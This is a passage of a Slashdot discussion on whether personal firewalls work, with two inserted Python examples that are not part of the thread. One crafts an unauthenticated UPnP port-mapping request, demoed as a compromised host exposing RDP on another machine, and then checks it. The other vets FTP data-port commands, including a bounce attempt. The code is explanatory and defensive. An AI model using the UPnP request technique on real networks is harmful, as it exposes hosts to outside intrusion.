    The right question to ask about effectiveness is what fraction of the spyware in circulation will be controlled by Zone Alarm and its kin. We accept a detection rate of 50-80% from antispyware programs. The threshold for a program like Zone Alarm should be higher because it has to be worth the hassles it causes, of course.

    Those hassles are probably inevitable. If you try to control outgoing traffic you are trying to add a feature that should have been in the OS, namely a new permissions system. Turf wars with the OS and destabilization due to hooking deep APIs are certain to happen. Historically if you attempted to touch the Windows network stack (PGPNet, for example, and the Freedom software forced me into a wipe and reinstall) you broke it.

    Outbound traffic controls are harder to subvert but less effective if you do them outside the client machine. How can a separate firewall box know whether a port is being opened by BitTorrent or by CoolWebSearch?

  68. How did this end up on slashdot?! by atlasdropperofworlds · · Score: 1

    It did contain the tag "duh", but still....

  69. Four Software Firewalls that Really Work! by Hercules+Peanut · · Score: 1

    I've been using these personal firewalls for years without a single occurrence of malware or rooting. See for yourself, they run on a variety of architectures. They can be found here and here.

    A couple of others that are nearly as good (in my personal experience) are here and here.

    Give them a try. You'll be impressed with the increased security.

  70. Re:You Mean Windows 2k/xp == Unix? by mpapet · · Score: 1

    designed to run securely and has all the security features of Unixes.

    And that's why you need a pix and an antivirus subscription and antispyware software and a NAT'd router on 2000/XP?

    Denial, it's not just a river in Africa my friend.

    --
    http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
  71. Re:In my experience software firewalls are invalua by joto · · Score: 1

    Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else.

    In other words: If that is your main problem, by all means, use Zone Alarm. However, for normal users that simply want to "improve the security" of their systems, and not use some expert geek friend to clean their system of garbage they could have easily avoided in the first place, it doesn't work. Besides, most sane people would fix such a problem with a reformat, as if your friends system was that bad, there's surely other problems lurking too.

    Further, she gets to see what programs try to access the internet.

    Which is exactly why I stopped using zonealarm. Without zonealarm constantly pestering me about dangerous "attacks", either software I used would silently stop working because they needed net access, or I would need to allow most everything by default, reducing any effectiveness of the firewall. A few weeks of clicking yellow dialog boxes, and you get enough. I didn't have a big problem with malicious software before ZA, and having the software equivalent of an annoying mum trying to warn you against stepping on something dangerous for every single step you take as you walk down the pavement, is just too annoying, too time-consuming, and too ridiculous. When you consider the additional implication, that your mum only notices the broken glass on the pavement, but never sees the madman with the gun sneaking up on you from behind, it becomes even more obvious that it's only a big waste of time.

  72. Re:No kidding... I've found them useless in practi by budgenator · · Score: 1

    Maybe a what-is button that actually told you what a program is, who wrote it, checked its signature, who the program was trying to talk to, and why the program's developer thought it important for the program to open a connection would help. Microsoft is a lot like Linux in one thing, they get blamed for a lot of stupid shit they have no control over right now and it's probably time for that to stop; there needs to be a signature program that's reasonably fair to big-time commercial, small-time commercial, and amateur software developers writing for the windows platform. If it ain't signed and registered, it don't run period.

    --
    Apocalypse Cancelled, Sorry, No Ticket Refunds
  73. Just asking...... by LibertineR · · Score: 1

    I would be interested in what Slashdotters think of ISA Server 2004? We have a number of clients who rely on it, and it would be instructive to discover any perceived flaws, or things that we should be looking out for? Thanks in advance.

  74. Time travel? by kybred · · Score: 1
    Updated Firewalling with PF talk / Oppdatert Brannmur med PF-foredrag:

    English - updated 21 September 2006

    I'm more interested in your time travel capabilities than your PF talk!

    kybred

  75. What of logs and ID? by msobkow · · Score: 1


    Sure you can use a hardware packet firewall for the essential functionality, but what of detailed logs, intrusion detection software, VPN solutions, SSH proxying, etc.?


    Aside from that, the hardware firewalls can be cracked, and have been in the past. But they're harder to upgrade and repair when an OSS patch is released a few hours later.


    People place too much faith in firewalls anyhow. Worse, a lot of them enable UPnP functionality, which becomes a gaping hole in the security because anything connected to the internal network can temporarily enable a port forward/masquerade. i.e. A UPnP exploit on the internal network means your external firewall is enslaved by the exploit, the same way admin rights allow an exploit to disable a software firewall on a Wintendo box.

    --
    I do not fail; I succeed at finding out what does not work.
    1. Re:What of logs and ID? by SillyNickName4me · · Score: 1

      Sure you can use a hardware packet firewall for the essential functionality

      And much more, depending on what you buy of course

      , but what of detailed logs,

      My linksys 'hardware firewall' runs a real syslog, and produces a nice duplicate of its log on another machine.

      intrusion detection software,

      If it isn't too big and you have the source.. my 'box' happens to run a simple snort configuration.

      VPN solutions,

      It also supports ipsec and as a nice bonus openvpn

      SSH proxying, etc.?

      Not just that, I can ssh into it and have a nice prompt..

      Aside from that, the hardware firewalls can be cracked, and have been in the past.

      Same for 'software firewalls'

      But they're harder to upgrade and repair when an OSS patch is released a few hours later.

      Now here is some news, you can have both.

      You are of course quite correct about the faith people put in firewalls, they are a tool, not an all covering security solution.
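    The UPnP hole that post 75 above describes, as an added example that is not part of the original thread: what an IGD AddPortMapping request looks like on the wire (the SOAP framing and argument names are those of the WANIPConnection:1 service), how the router or an IDS watching the LAN would pick it apart, and the sanity checks a router could apply before honouring it. The addresses, ports, the SENSITIVE_PORTS list and the review rules are constructed for the demo, not anything a real IGD implements.

```python
from dataclasses import dataclass
from typing import List
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"
ET.register_namespace("s", SOAP_NS)
ET.register_namespace("u", WANIP_NS)

# Ports that should never become reachable from the Internet on a LAN host's
# say-so. A constructed list for the demo, not a standard.
SENSITIVE_PORTS = {22, 23, 135, 139, 445, 3389}


@dataclass
class PortMapping:
    external_port: int
    protocol: str          # "TCP" or "UDP"
    internal_port: int
    internal_client: str   # LAN address that receives the forwarded traffic
    description: str
    lease_seconds: int     # 0 means "until someone deletes it"
    remote_host: str = ""  # "" = any remote host may connect
    enabled: bool = True


def build_add_port_mapping(m: PortMapping) -> bytes:
    """The SOAP body a LAN host POSTs to the IGD control URL, sent with the header
    SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping".
    No authentication is part of the exchange; that is the hole the post describes."""
    env = ET.Element("{%s}Envelope" % SOAP_NS,
                     {"{%s}encodingStyle" % SOAP_NS: SOAP_ENC})
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    act = ET.SubElement(body, "{%s}AddPortMapping" % WANIP_NS)
    for name, value in (
        ("NewRemoteHost", m.remote_host),
        ("NewExternalPort", str(m.external_port)),
        ("NewProtocol", m.protocol),
        ("NewInternalPort", str(m.internal_port)),
        ("NewInternalClient", m.internal_client),
        ("NewEnabled", "1" if m.enabled else "0"),
        ("NewPortMappingDescription", m.description),
        ("NewLeaseDuration", str(m.lease_seconds)),
    ):
        ET.SubElement(act, name).text = value
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def parse_add_port_mapping(body: bytes) -> PortMapping:
    """What the IGD (or an IDS sniffing the LAN) extracts before acting.
    Parse XML from untrusted hosts with defusedxml in production; plain ET is
    used here only to keep the example dependency-free."""
    root = ET.fromstring(body)
    act = root.find(".//{%s}AddPortMapping" % WANIP_NS)
    if act is None:
        raise ValueError("not an AddPortMapping request")

    def arg(name: str) -> str:
        el = act.find(name)
        if el is None:
            raise ValueError("missing argument %s" % name)
        return (el.text or "").strip()

    proto = arg("NewProtocol").upper()
    if proto not in ("TCP", "UDP"):
        raise ValueError("bad protocol %r" % proto)
    return PortMapping(
        external_port=int(arg("NewExternalPort")),
        protocol=proto,
        internal_port=int(arg("NewInternalPort")),
        internal_client=arg("NewInternalClient"),
        description=arg("NewPortMappingDescription"),
        lease_seconds=int(arg("NewLeaseDuration")),
        remote_host=arg("NewRemoteHost"),
        enabled=arg("NewEnabled") == "1",
    )


def review_mapping(m: PortMapping, requester_ip: str) -> List[str]:
    """Findings a router could refuse on (or an admin alert on). An empty list is
    the ordinary case: a host asking for its own BitTorrent port for an hour."""
    findings = []
    if m.internal_client != requester_ip:
        findings.append("maps traffic to %s, not to the requester %s"
                        % (m.internal_client, requester_ip))
    if m.lease_seconds == 0:
        findings.append("permanent mapping (lease 0)")
    if m.external_port < 1024:
        findings.append("privileged external port %d" % m.external_port)
    if m.internal_port in SENSITIVE_PORTS:
        findings.append("exposes management/file-sharing port %d" % m.internal_port)
    return findings


if __name__ == "__main__":
    # Constructed: a compromised host at .50 opens RDP on a different machine, for good.
    req = build_add_port_mapping(PortMapping(3389, "TCP", 3389, "192.168.1.10", "helper", 0))
    print(req.decode())
    print(review_mapping(parse_add_port_mapping(req), "192.168.1.50"))
```

    The point of the review function is the first rule: nothing in the protocol ties NewInternalClient to the host making the request, so a single infected machine can expose any other box on the LAN unless the router checks.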

  76. Re:IP Tables by msobkow · · Score: 2, Interesting

    openSuSE 10.1 actually makes it sickeningly easy to configure a firewall, subnet masquerading, DNS merging, and port forwarding. It took less than two hours to get it all working (including dial-up and DHCP network alteration of the DNS forwarding.) IIRC it took almost two days to get it working with RedHat 5.2.

    I realize it's not a fair comparison, as there is over 5 years of dev work in between the two, but the point is you don't need much knowledge, just a spare dual-nic box that'll run one of the more recent distros.

    A friend of mine is a bit annoyed. It was faster and easier to set up SuSE's firewall and have it working reliably than his WinXP dial-up node. :P

    --
    I do not fail; I succeed at finding out what does not work.
  77. most sane people would reinstall? by brokeninside · · Score: 1

    And just how would most sane people keep from getting infected again while updating Windows to a reasonably secure level? The average time it takes for a plain vanilla Windows install to get broken by malware is less than the amount of time it takes to navigate to Windows update.

    I think that perhaps you disqualified yourself from the conversation with the admission that you've never had large problems with malware. There is a very large number of people that have precisely that problem and, for those people, a decent firewall can be part of the solution.

    1. Re:most sane people would reinstall? by joto · · Score: 1

      And just how would most sane people keep from getting infected again while updating Windows to a reasonably secure level? The average time it takes for a plain vanilla Windows install to get broken by malware is less than the amount of time it takes to navigate to Windows update.

      Well, the point is that personal "application-level" firewalls do not help in protecting you from trojans. Which is what they are marketed as. If you are worried about people attacking you from the outside, simply use an external firewall/NAT appliance like everybody else. In addition to making you safe from the above-mentioned problem, it is hassle-free, relatively cheap, offers other advantages such as Internet sharing/home office networking/wireless, and protects you even when you haven't had time to install ZA or whatever personal firewall of choice you intend to use.

      I think that perhaps you disqualified yourself from the conversation with the admission that you've never had large problems with malware. There is a very large number of people that have precisely that problem and, for those people, a decent firewall can be part of the solution.

      (First off, of course I've had problems with malware at some point in the past. It's just that I've learnt from my experiences, and now know what to do and what not to do. Most people, however seem unable to learn from experience. A bad driver usually stays a bad driver, etc... However...)

      The people who are too stupid to make use of common sense on the Internet to avoid viruses and malware, are certainly too stupid to effectively make use of a personal firewall. I'm a professional, and I found it unworkable because it was just hassling me too much. An average user who can't even figure out what the never-ending popups from it means, will soon be conditioned into simply clicking "yes", which defeats the whole purpose. It's like having a doorman that looks mean, but lets anyone into the house, and even out of it again, carrying your TV, without even attempting to look at them.

      A simple NAT-appliance protects even the stupid people, and because it's always on, even better than a personal firewall. I'll agree that ad-aware and antivirus might help some poor fucker who's already lost the race against malware (and even help protecting the stupid at times), but any security product that increases "work" significantly more than it increases security just isn't worth the hassle. This includes personal firewalls. And unless you're trying out new executables, you don't need your antivirus taking up half the computer's resources either.

  78. What *I* want from a firewall/security system by Anonymous Coward · · Score: 0

    By 1250 PST I've read every level 4 and above comment. But for weeks now I've been wondering about a firewall that is both first and last line of defense. How about a firewall that does this?:

    -- Lets the user select folders that NO application is allowed to read

    -- Not only warns the user that a banned folder is being subject to read attempts, but immediately blocks access and performs a reverse lookup of the site and the app being used by that site, whether the app is HTML, Java, C/C++, whether local or remote

    -- not only shows the hex stream, but the PLAIN LANGUAGE (localized, of course) so the user can see what is going on.

    -- sets up a honeypot of tempting docs to cull a list of existing abusive sites and tributary sites so an automatic blacklist can be performed.

    -- lets me generate a list of keywords I ban and allows me to substitute words that actually get let out of the system so the end-delivery is useless to the sniffing side

    -- warns the user of encrypted inbound and outbound traffic so the user can say, "Hey, I'm not actively doing anything that warrants encryption, either site-initiated, or invoked by me." This way, I can be suspicious of encrypted traffic that might be hiding contents lifted from my lan or disks.

    See, what **I** am worried about is masked processes that sniff around my files and catalog key or interesting words, then wait for me to turn on some legitimate local or remote system-intensive app. Once I've turned on a system-bogging app, the invasive app secretly slip-streams my gems into the upstream info.

    At this point, the attacker could then direct my nuggets to a legit site or one that LOOKS like one I could trust, but maybe even THAT site or its spoof may have been "had", meaning I might never know to where my data ultimately gets directed.

    (Posting anonymously just in case i am being keystroked at work...)

    David Syes

  79. Re:BSD firewall tutorial (was Re:misleading headli by Anonymous Coward · · Score: 0

    hey, i use your guide all the time.. it's good when you don't have the time to read all the man pages for pf, but i miss more about authpf as it is a super great feature

    thanx from norway ;)

  80. AVG by GlL · · Score: 1

    Step One: Uninstall all McAfee related products on your computer.

    Step Two: Go to http://free.grisoft.com/ and download and install their FREE anti virus software.

    Best fix for McAfee I have seen yet.

    --
    I'm a happy pessimist. I expect and prepare for the worst, when it doesn't happen I am pleasantly surprised.
  81. Idiotic article. Blame your tools. by syousef · · Score: 2, Insightful

    This article basically says personal firewalls are useless because there are things they can't prevent. Recently I've seen someone argue antivirus software is useless because they aren't 100% accurate and won't catch all your virii. Okay well I have some screwdrivers at home. I want to put together a cupboard this evening. I'll only need the phillips head. Should I throw out the flathead since it won't do all my work for me? Moronic.

    Yes, software firewalls have their problems. Yes, they do require some knowledge to use correctly (as does almost all software!)

    Personally I use a hardware firewall for incoming, a software firewall for inbound, I do run as admin because Windows just isn't designed to be run well from an unprivileged account. I use antivirus too though I do switch it off if my computer's going to be doing something CPU or disk intensive AND I'm not doing anything I consider risky.

    Furthermore you can't test 6 bits of firewall software and extrapolate that they're all garbage from the sample.

    --
    These posts express my own personal views, not those of my employer
  82. HI_PORTS... by tacocat · · Score: 1

    I want to know how you are supposed to block ports from going outbound if you have to deal with this stupid FTP process that goes hi_port to hi_port... I can't remember right now what it's called because it's been a long time since I actually wrote my iptables firewall but this is something that was always strange to me.
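    The FTP negotiation the post above is asking about, as an added example that is not part of the original thread: the bookkeeping an FTP-aware stateful firewall does (the ip_conntrack_ftp / nf_conntrack_ftp helper on Linux, ftp-proxy with pf) so that it can admit exactly one high-port data connection as RELATED to the control connection instead of opening whole ranges of outbound high ports. It parses PORT/EPRT commands and PASV/EPSV replies seen on the control channel, predicts the data connection, and applies the strict checks a helper applies before opening anything. Sample lines, the 10.0.0.5 and 10.0.0.9 addresses, and the verdict wording are constructed; nf_conntrack_ftp's own behaviour is only summarised in the comments.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class DataConn:
    mode: str       # "active": server port 20 -> client:port; "passive": client -> server:port
    src_ip: str     # side that opens the data connection
    dst_ip: str
    dst_port: int


# h1,h2,h3,h4,p1,p2 as used by PORT and by the 227 reply; port = p1*256 + p2
_HOSTPORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")
_EPRT = re.compile(r"^EPRT \|[12]\|([^|]+)\|(\d+)\|$", re.I)          # RFC 2428
_EPSV = re.compile(r"^229 .*\(\|\|\|(\d+)\|\)")                          # RFC 2428


def _decode_hostport(m):
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError("octet out of range in %s" % m.group(0))
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def _vet(ip: str, port: int, peer: str) -> None:
    """Strict-mode checks before creating an expectation: the announced address must
    be the control-connection peer (otherwise FTP bounce, or a NATed server leaking
    its private address; nf_conntrack_ftp only relaxes this when loaded with loose=1)
    and the port must be unprivileged (otherwise the server is told to connect to,
    say, port 25 on the victim)."""
    if not 1024 <= port <= 65535:
        raise ValueError("refusing data port %d" % port)
    if ipaddress.ip_address(ip) != ipaddress.ip_address(peer):
        raise ValueError("announced %s but control peer is %s" % (ip, peer))


def from_client(line: str, client_ip: str, server_ip: str) -> Optional[DataConn]:
    """Command seen on the control channel going client -> server."""
    line = line.strip()
    if line.upper().startswith("PORT "):
        m = _HOSTPORT.search(line)
        if m is None:
            raise ValueError("malformed PORT")
        ip, port = _decode_hostport(m)
    else:
        m = _EPRT.match(line)
        if m is None:
            return None  # USER, LIST, RETR ...: nothing to pre-open
        ip, port = m.group(1), int(m.group(2))
    _vet(ip, port, client_ip)
    return DataConn("active", server_ip, ip, port)


def from_server(line: str, client_ip: str, server_ip: str) -> Optional[DataConn]:
    """Reply seen on the control channel going server -> client."""
    line = line.strip()
    if line.startswith("227 "):
        m = _HOSTPORT.search(line)
        if m is None:
            raise ValueError("malformed 227 reply")
        ip, port = _decode_hostport(m)
    else:
        m = _EPSV.match(line)
        if m is None:
            return None
        ip, port = server_ip, int(m.group(1))   # EPSV carries only the port
    _vet(ip, port, server_ip)
    return DataConn("passive", client_ip, ip, port)


def verdict(line: str, from_client_side: bool, client_ip: str, server_ip: str) -> str:
    """One-line decision in the shape a conntrack expectation takes: the single
    flow to admit as RELATED, or why the helper refused."""
    try:
        dc = (from_client if from_client_side else from_server)(line, client_ip, server_ip)
    except ValueError as e:
        return "drop: %s" % e
    if dc is None:
        return "ignore"
    return "expect %s %s -> %s:%d" % (dc.mode, dc.src_ip, dc.dst_ip, dc.dst_port)


if __name__ == "__main__":
    # Constructed control-channel excerpt: client 10.0.0.5, server 10.0.0.9.
    for from_c, line in [(True, "PORT 10,0,0,5,19,137"),
                         (False, "227 Entering Passive Mode (10,0,0,9,195,80)."),
                         (True, "PORT 10,0,0,9,0,25"),   # bounce attempt
                         (True, "EPRT |1|10.0.0.5|5002|"),
                         (False, "229 Entering Extended Passive Mode (|||50001|)")]:
        print(line, "=>", verdict(line, from_c, "10.0.0.5", "10.0.0.9"))
```

    With the helper loaded (and the control connection matched by a rule with `-m state --state ESTABLISHED`), a single `--state RELATED` accept rule covers both directions' data connections, which is what makes an outbound default-deny workable with FTP at all.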

  83. Personal Firewall = Total Waste Of Time & Mone by pandrijeczko · · Score: 1
    If you run a desktop machine that has no need to run services to anyone on the Internet, then you do NOT need any firewall on the machine. Just spend $50 or £50 on a NAT router (and probably have wireless thrown in to boot), make sure you use a private IP address behind the router and do not open up any port mappings.

    It *REALLY IS* that simple. Period.

    --
    Gentoo Linux - another day, another USE flag.
  84. Wrong idea in article by Anonymous Coward · · Score: 0

    "Users who still prefer a firewall should first check whether they are using a router with firewall functionality. If so, then no firewall is needed, including the one built in to Windows XP, reports PC Professionell."

    I remember a law enforcement officer I met saying how hard it was to use multiple firewalls, and you could hire his company to do it, LOL. He also recommended a hardware box, HOWEVER, the ones reading this, don't realize a NAT box, from a firewall. SO, IMHO, you should STILL use a software firewall. And learn about and how to use computers, because NO I am not coming over to fix yours!
    While ZoneAlarm isn't the best firewall (best is a combination of firewalls, and knowledgeable users), it has helped with uneducated/undereducated pc users (my mother for example), tell when their computer is about to do something they don't want it to do.
    Your first line of defense is ALWAYS you, who do you let use your pc, do you leave it connected, logged into, powered up by request, etc.

  85. I disagree by Anonymous Coward · · Score: 0

    These techniques like the POC provided usually use IE to send outgoing connections.

    I personally block IE from accessing the Internet which renders that POC useless.

  86. my solution by Anonymous Coward · · Score: 0

    which I use at home is an old computer (was a 166MHZ CPU/32MB RAM, but is now a 300MHZ CPU/64MB RAM). A linux distro called IP COP which is based on a similar distro called smoothwall.

    It turns your old computer into a dedicated firewall/router that operates under broadband, dialup and apparently now has wireless support. And if you add Mike's Hosts File to it then you have a a fairly easy setup for safer web surfing.

    Combined with using Mozilla Firefox/Thunderbird on the computers that connect through my IP COP distro, I've had very few issues with spyware, pop-up adverts and other misc headaches.

  87. Re:Which software - little snitch on OSX by vaporland · · Score: 1

    Little Snitch on OSX works great at tracking / blocking outbound traffic.

    --
    Ask Me About... The 80's!
  88. Little Snitch only blocks outgoing traffic by vaporland · · Score: 1

    but works great otherwise

    --
    Ask Me About... The 80's!
  89. Re:Several home hardware firewalls are available by zotz · · Score: 1

    I was not asking about multiple internal ethernet ports but rather multiple ethernet interfaces.

    all the best,

    drew

    --
    FreeMusicPush If you want to see more Free Music made, listen to Free
  90. But we already knew this! by Baloo+Ursidae · · Score: 1
    More and more security research come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

    Duh! You're telling us what we already know. Anybody who hasn't been paying attention and blindly goes with "The article is flawed! Personal firewalls *really* work!" should be modded down -1 Dumbass until they show me the source for their personal firewall.

    --
    Help us build a better map!
  91. No test data, only "conclusions"...WTF by FredThompson · · Score: 1

    This reads like a shill piece. There's no data mentioned, only "statements" about the claimed state of software firewalls. My BS meter is starting to twitch...

  92. Simply tested the wrong stuff... by Hurricane78 · · Score: 1

    They should have added "Agnitum Outpost Firewall Pro" to their list. This piece of software - when all features are enabled - is some hard ass mofo in things of security.
    For example: I click a link in a prog that's not allowed to connect. Now it opens in firefox. Which then is blocked too because it got manipulated by the program. I did not see that in others like panda, norton or some free ones.
    Of course you can get this on linux. But it's much more work for the end-user. :\

    Outpost is the first win-fw that i'm really happy with.
    But sure: If you're an idiot and you disable half of the stuff and say "allow all" to every important security question, this helps nothing.
    But don't you then just *DESERVE* to be filtered out by natural selection? ;)
    (I would find it unfair for us otherwise!)

    --
    Any sufficiently advanced intelligence is indistinguishable from stupidity.
  93. Which hardware? by Futurepower(R) · · Score: 1

    Which Linksys hardware do you use that supports OpenVPN?

    Where did you get the firmware?

    1. Re:Which hardware? by SillyNickName4me · · Score: 1

      A Linksys WRT54G v2.2, running OpenWRT with the OpenVPN package installed.

      No doubt DD-WRT supports this as well.

      The point of my post however is that a 'hardware firewall' is just another machine, it is nothing special. You could use a Linksys WRT54G or something compatible, which has some nice features (programmable switch with vlan support and hardware support for AES being the more obvious ones to me), but you could also use a small Soekris box and install for example MiniBSD on it and build the thing from scratch.

      Either way you get a tiny, silent, dedicated box without any moving parts that implements your firewall.

  94. Re:BSD firewall tutorial (was Re:misleading headli by Anonymous Coward · · Score: 0

    I guess you complain about it taking more than one hour to learn how to drive a car as well? (Feel free to miss the point - you seem to have a talent for it.)

  95. Re:lol by Pieroxy · · Score: 1

    My WRT is just fine and hasn't been rebooted in months with 2 bittorrent clients and a few emule shooting at it constantly. Plus the regular http, ftp and emails both ways. The WRT runs Linux just fine and it makes a hell of a router!

  96. Re:Several home hardware firewalls are available by Optic7 · · Score: 1

    Drew, I'm still not sure what you mean. Do you mean for example two internal and two external Ethernet interfaces, or different types of Ethernet connections (RJ45, Coax, AUI, etc)? Or something else completely? The firewalls that I listed have 5 Ethernet interfaces, one being for the external network (cable, DSL, etc), and the rest for the internal network, typically with at least one that can be set for DMZ.

    Shenan

  97. Re:Several home hardware firewalls are available by zotz · · Score: 1

    I may just be being dense today.

    I have a wrt54g. It has an external interface and 4 ports that are on the internal interface and the wireless is also on the internal interface.

    So, I have (in linux terms) eth0 connected to the net (24.244.xxx.xxx) and eth1 (192.168.100.1) on the inside. eth1 has multiple ports.

    I am asking for something that can do:

    eth0 (24.244.xxx.xxx)
    eth1 (192.168.100.1)
    eth2 (192.168.101.1)
    eth3 (192.168.102.1)

    at a minimum.

    Someone else indicates that the wrt54g can do what I want. I need to investigate more.

    Is my explanation clear now at least? Or should I try again to explain?

    all the best,

    drew
    (da idea man)

    --
    FreeMusicPush If you want to see more Free Music made, listen to Free